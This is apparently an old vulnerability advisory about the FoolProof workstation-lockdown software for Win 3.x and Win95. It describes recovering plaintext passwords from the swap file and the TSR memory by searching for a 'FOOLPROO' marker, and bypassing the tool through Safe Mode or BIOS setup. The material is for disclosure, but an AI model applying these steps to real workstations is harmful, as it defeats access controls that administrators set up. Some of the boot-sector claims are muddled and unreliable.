|
Vulnerability FoolProof Affected Win 3.x, Win95 Description 'Mark M. Marko' has found a weakness in the password impelementation of FoolProof. FoolProof is a software package used to secure workstations and LAN client machines from DoS and other lame-ass attacks by protecting system files (autoexec.bat, config.sys, system registry) and blocking access to specified commands and control panels. FoolProof was written by Smart Stuff software originally for the Macintosh but recently released for win3.x and win95. All information here pertains directly to versions 3.0 and 3.3 of both the 3.x and 95 versions but should be good for all early versions if they exist. This program is capable of modifying the boot sequence on win3.x machines to block the use of hot keys and prevent users from breaking out of autoexec. It also modifies the behavior of command.com so that commands can be verified by a database and anything deemed unesseccary or potentially malicious can be blocked (fdisk, format, dosshell?, dir, erase, del. defrag, chkdsk, defrag, undelete, debug, etc.). Its windows clients provide for a way to log into/out of FoolProof for privilaged access by using a password or hot key assignment. The newer instalation of 95 machines have a centralized configuration database that lives on our NetWare server. First success with breaking FoolProof passwords came by using a hex editor to scan the windows swap file for anything that might be of interested. In the swap file you can find the password in plain text. If you use a memory editor on the machine you will find that FoolProof stores a copy of the user password IN PLAIN TEXT inside its TSR's memory space. To find a FoolProof password, simply search through conventional memory for the string "FOOLPROO" (I don't know what they did with that last "F") and the next 128 bytes or so should contain two plaintext passwords followed by the hot-key assignment. For some reason FoolProof keeps two passwords on the machine, the present one and a 'legacy' password (the one you used before you _thought_ it was changed). There exist a few memory viewers/editors but it isn't much effort to write something. It is more difficult to do this on the win3.x machines because FoolProof isn't compromised by the operating system it sits on top of; basicly getting a dos prompt is up to you (try file manager if you can). 95 is easier because it is very simple to convince 95 that it should start up into Safe-Mode and then creating a shortcut in the StartUp group to your editor and then rebooting the machine (FoolProof doesn't get a chance to load in safe mode). FoolProof also doesn't protect the 'Press Del to enter Setup' at bootup, so you can reset the boot sector to default (this works on some models where it resets the boot sector to factory default), which I think bypasses the F5 thing. Before that happens though, the boot sector has to be in memory already (the old one), so that the system can replace the new one with the old one. Solution This is true for some cases, but the latest FoolProof allows a option that will prompt for a password if someone presses F5 or F8 at bootup. It will then allow you unlimited tries, but you can't resume normal bootup unless you reboot.